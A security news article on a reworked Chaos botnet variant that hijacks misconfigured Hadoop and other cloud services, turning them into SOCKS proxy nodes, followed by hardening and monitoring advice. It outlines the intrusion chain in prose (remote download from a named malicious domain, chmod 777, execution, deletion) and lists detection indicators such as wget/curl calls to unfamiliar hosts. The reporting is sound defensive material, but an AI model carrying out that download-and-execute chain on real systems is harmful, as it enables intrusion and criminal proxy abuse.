A new variant of the Chaos botnet malware is shifting its focus from home routers and edge devices to misconfigured cloud infrastructure, turning vulnerable Hadoop and similar services into powerful, anonymized nodes for criminal operations. This evolution reflects a broader trend: modern botnets increasingly abuse cloud platforms not only for distributed denial-of-service (DDoS) attacks, but also as high‑bandwidth, low‑friction proxy networks.
Chaos malware shifts from home routers to cloud environments
According to research by Darktrace, the updated Chaos botnet was recently observed attacking a honeypot that emulated a poorly secured Hadoop cluster. The cluster intentionally exposed a remote code execution path, mirroring common misconfigurations found in real‑world cloud deployments.
The intrusion started with an HTTP request to the Hadoop service that triggered the creation of a new application. Within this legitimate operation, the attackers embedded a chain of shell commands: download of a Chaos agent binary from the adversary‑controlled host pan.tenire[.]com, assignment of full permissions via chmod 777, execution of the file, and subsequent deletion to reduce forensic traces on disk.
This attack flow is typical for cloud‑focused botnets. An exposed or overly permissive service—whether Hadoop, Docker, Kubernetes, or another container/orchestration component—serves as the initial foothold. Once code execution is obtained, the malware deploys itself and enrols the cloud server as part of the botnet, often without immediate impact visible to the victim organization.
Origin of the Chaos botnet and links to Kaiji and Chinese infrastructure
Chaos malware was first documented in depth by Lumen Black Lotus Labs in 2022 as a cross‑platform threat targeting both Windows and Linux. Its earlier variants supported remote command execution, modular payload download, SSH credential brute‑forcing for lateral movement, cryptocurrency mining, and multi‑protocol DDoS attacks over HTTP, TLS, TCP, UDP, and WebSocket.
Researchers have long suspected that Chaos represents an evolution of the Kaiji DDoS botnet family, which previously targeted, among other things, misconfigured Docker instances. Overlaps in code patterns, combined with the use of infrastructure hosted in China and the presence of Chinese‑language strings, have led to hypotheses of possible Chinese‑speaking operators, though no definitive attribution has been established.
The domain infrastructure in the latest Chaos activity intersects with earlier campaigns by the Silver Fox threat group. This actor reportedly used pan.tenire[.]com to distribute lure documents and the ValleyRAT malware, activity that Seqrite Labs associated with an operation dubbed Operation Silk Lure. The recurring use of the same domain illustrates a common criminal pattern: re‑cycling trusted infrastructure across multiple malware families to maximize return on investment.
Technical changes: no self-propagation, new SOCKS proxy capability
The payload observed on compromised cloud servers is a 64‑bit ELF binary, representing a reworked and updated Chaos variant. Darktrace’s analysis indicates that core capabilities have been preserved, but the architecture has been significantly modified and earlier code segments linked to Kaiji have been rewritten or heavily refactored.
The most notable change is the removal of self‑propagation features. The new Chaos build no longer performs SSH brute‑force attacks or exploits router vulnerabilities on its own. Instead, the developers have introduced native SOCKS proxy functionality, allowing a compromised server to relay arbitrary network traffic on behalf of the attacker.
A SOCKS proxy can forward almost any type of network connection through the infected machine, effectively masking the true IP address of the operator. For defenders, this dramatically complicates attribution and response: malicious activity appears to originate from legitimate cloud provider IP space, often with good historical reputation, while the real command infrastructure may sit several proxy “hops” further downstream.
Monetization model: from DDoS‑for‑hire to criminal proxy services
The addition of SOCKS proxy capabilities suggests a shift in the Chaos botnet monetization strategy. Earlier versions likely generated revenue primarily through cryptomining and paid DDoS‑for‑hire services. By contrast, the new variant is well positioned to support proxy‑as‑a‑service offerings on underground markets, a trend also seen in other botnets such as AISURU.
For organizations, this means that a compromised cloud instance may now be used not only to launch DDoS attacks, but also as an anonymization layer for phishing campaigns, credential stuffing, intrusion attempts, command‑and‑control obfuscation, or evasion of geo‑ and IP‑based access controls. Even if no internal data is stolen, victims risk blacklisting of their IP ranges, damage to brand reputation, and potential legal or regulatory scrutiny when their infrastructure is implicated in downstream attacks.
How to protect cloud infrastructure from Chaos and similar botnets
Secure configuration and strong access control
The primary enabler of Chaos infections is misconfigured cloud services. Organizations should strictly limit remote code execution capabilities in Hadoop, Docker, Kubernetes, and related platforms; disable anonymous or unnecessary access; and apply the principle of least privilege to all service accounts and management interfaces. Administrative consoles must be isolated on private network segments and protected with multi‑factor authentication and robust logging.
Network and behavior monitoring for early detection
Effective defense requires continuous monitoring via NDR/EDR and cloud security solutions capable of detecting anomalous network behavior. Suspicious indicators include unexpected outbound connections to rare or newly registered domains, sudden spikes in TCP/UDP traffic volumes, or unusual HTTP bursts to atypical destinations. On Linux servers, red flags may include wget/curl calls to unfamiliar external URLs, frequent use of chmod 777, and the appearance or rapid deletion of unknown ELF binaries.
Vulnerability management and incident readiness
Regular operating system and middleware patching, combined with configuration audits against standards such as CIS Benchmarks, significantly reduces the attack surface. Organizations should maintain and exercise an incident response plan specifically covering cloud workloads, including predefined procedures to rapidly isolate compromised nodes, rotate credentials, and redeploy from clean, tested backups.
The rapid evolution of the Chaos botnet underscores how quickly threat actors adapt to cloud adoption and growing demand for traffic anonymization. DDoS is no longer the sole or even primary risk; any exposed or misconfigured cloud service can be transformed into a high‑value node in a global proxy network. Organizations that proactively harden their cloud configurations, enhance monitoring, and invest in staff training are far better positioned to prevent their own infrastructure from becoming an invisible asset in someone else’s cybercrime operation.
